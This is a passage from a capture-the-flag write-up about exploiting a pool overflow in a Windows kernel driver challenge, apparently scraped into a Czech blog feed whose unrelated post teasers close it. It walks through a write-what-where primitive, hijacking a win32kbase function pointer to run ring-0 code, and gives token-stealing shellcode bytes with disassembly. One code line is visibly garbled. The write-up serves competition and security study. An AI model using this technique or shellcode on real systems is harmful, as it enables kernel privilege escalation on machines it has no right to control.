VOID WriteWhatWhere4(ULONG_PTR CorruptedIndex, ULONG_PTR Where, DWORD What) { globals::PostingList.size = (Where - (ULONG_PTR)& / sizeof(DWORD); AddToIndex(CorruptedIndex, What, "fake"); }

With all this in place, we can test that it works:

WriteWhatWhere4(CorruptedIndex, 0x4141414141414141LL, 0x42424242);

which should trigger the following exception in the vulnerable driver:

CONTEXT: ffff9609683dacb0 -- (.cxr 0xffff9609683dacb0) rax=00007ff6a90b2930 rbx=ffffe48f8135b5a0 rcx=10503052a60d85fc rdx=0000000042424242 rsi=ffffe48f82d7d70c rdi=ffff9609683db7d4 rip=fffff8038ccc1905 rsp=ffff9609683db6a0 rbp=ffffe48f82c79ef0 r8=0000000000000001 r9=0000000000000014 r10=0000000000000000 r11=0000000000000000 r12=ffffe48f82c79ef0 r13=ffffe48f81382ac0 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206 searchme+0x1905: fffff803`8ccc1905 3954881c cmp dword ptr [rax+rcx*4+1Ch],edx ds:002b:41414141`4141413c=????????

The above crash log doesn’t fully illustrate the “write” operation due to some prior meaningless reads from, but the attack works.

Executing shellcode

At this point, I could write arbitrary kernel memory but not read it, which ruled out the option of data-only attacks performed directly from user-mode. However, with the write-what-where primitive in hand, executing ring-0 shellcode should be just a formality. In this case, it was made even easier thanks to the fact that the exploit was running at Medium integrity, so it had access to the base addresses of kernel modules, and could acquire other useful addresses through the various information classes of NtQuerySystemInformation.

In his Black Hat USA 2017 talk, Morten Schenk proposed that arbitrary write can be used to overwrite kernel function pointers residing in the .data section of win32kbase.sys, and more specifically in the win32kbase!gDxgkInterface table used by graphical syscalls from the NtGdiDdDDI* family. The system call handlers are in fact trivial wrappers around the function pointers, and conveniently don’t corrupt any of the arguments passed through the RCX, RDX, … registers, e.g.:

This allows the attacker to invoke arbitrary kernel functions with controlled arguments, and receive the return values. As discussed by Morten, the complete exploitation process consists of just a few simple steps:

  1. Overwrite the function pointer with the address of nt!ExAllocatePoolWithTag.
  2. Call the routine with the NonPagedPool parameter to allocate writable/executable memory.
  3. Write the ring-0 shellcode to the allocated memory.
  4. Overwrite the function pointer with the address of the shellcode.
  5. Call the shellcode.

The above scheme makes it possible to cleanly execute the desired payload without corrupting the system state (except for the one overwritten pointer). In his paper, Morten suggested the use of NtGdiDdDDICreateAllocation as the proxy syscall, but I found that it was used in Windows sufficiently often that the system would start malfunctioning if the pointer was not promptly fixed up. To make my life a little bit easier, I chose a less frequently used service that seemed to be called exclusively by my exploit: NtGdiDdDDIGetContextSchedulingPriority.

After implementing the logic in code, I could enjoy arbitrary kernel code execution – in this example, a single int3 instruction:

kd> g Break instruction exception - code 80000003 (first chance) ffffc689`b8967000 cc int 3 0: kd> u ffffc689`b8967000 cc int 3 ffffc689`b8967001 c3 ret [...] 0: kd> !pool @rip Pool page ffffc689b8967000 region is Nonpaged pool *ffffc689b8967000 : large page allocation, tag is ...., size is 0x1000 bytes Owning component : Unknown (update pooltag.txt) Elevating privileges

In Windows, one of the easier ways of elevating one’s privileges in the system is to “steal” the security token of a system process and copy it to the current process (specifically to EPROCESS.Token). An address of a system process can be found in the static memory of the ntoskrnl.exe image, under nt!PsInitialSystemProcess. As the attack only involves the copying of one pointer between two kernel structures, the shellcode only consists of six instructions:

// The shellcode takes the address of a pointer to a process object in the kernel in the first // argument (RCX), and copies its security token to the current process. // // 00000000 65488B0425880100 mov rax, [gs:KPCR.Prcb.CurrentThread] // -00 // 00000009 488B80B8000000 mov rax, [rax + ETHREAD.Tcb.ApcState.Process] // 00000010 488B09 mov rcx, [rcx] // 00000013 488B8958030000 mov rcx, [rcx + EPROCESS.Token] // 0000001A 48898858030000 mov [rax + EPROCESS.Token], rcx // 00000021 C3 ret CONST BYTE ShellcodeBytes[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00\x48\x8B\x80\xB8\x00\x00\x00" "\x48\x8B\x09\x48\x8B\x89\x58\x03\x00\x00\x48\x89\x88\x58\x03\x00" "\x00\xC3"; Getting the flag

Once the security token of the exploit process is replaced, we have full control over the operating system. We can start an elevated command prompt and read the flag:

In summary, after approximately 15 hours of work, the exploit was functional and netted us 120 points + 30 points of a first (and last) blood bonus. Thanks go to Niklas for creating this fun challenge and to WCTF organizers for running the competition. I think the task and its solution neatly illustrate that even today, theoretically minor bugs such as off-by-one overflows on the kernel pool may be conceptually simple to exploit, given the right set of circumstances. Buffer overflow exploitation in Windows is not dead just yet. :)

As a reminder, the full source code of the exploit is available on GitHub.

Chystá se konec a stěhování. - 28 Květen, 2017 - 02:00
Takže, tohle je poslední příspěvek na starém A také jeden z prvních , co se objeví i na novém, provozovaném na
Kategorie: Blogy

Aktuální vypsané termíny školení - sociální sítě, bezpečnost, internetový marketing, public relations - 17 Květen, 2017 - 02:00
Více informací o všech školeních i dalších možnostech školení na míru najdete na
Kategorie: Blogy
Syndikovat obsah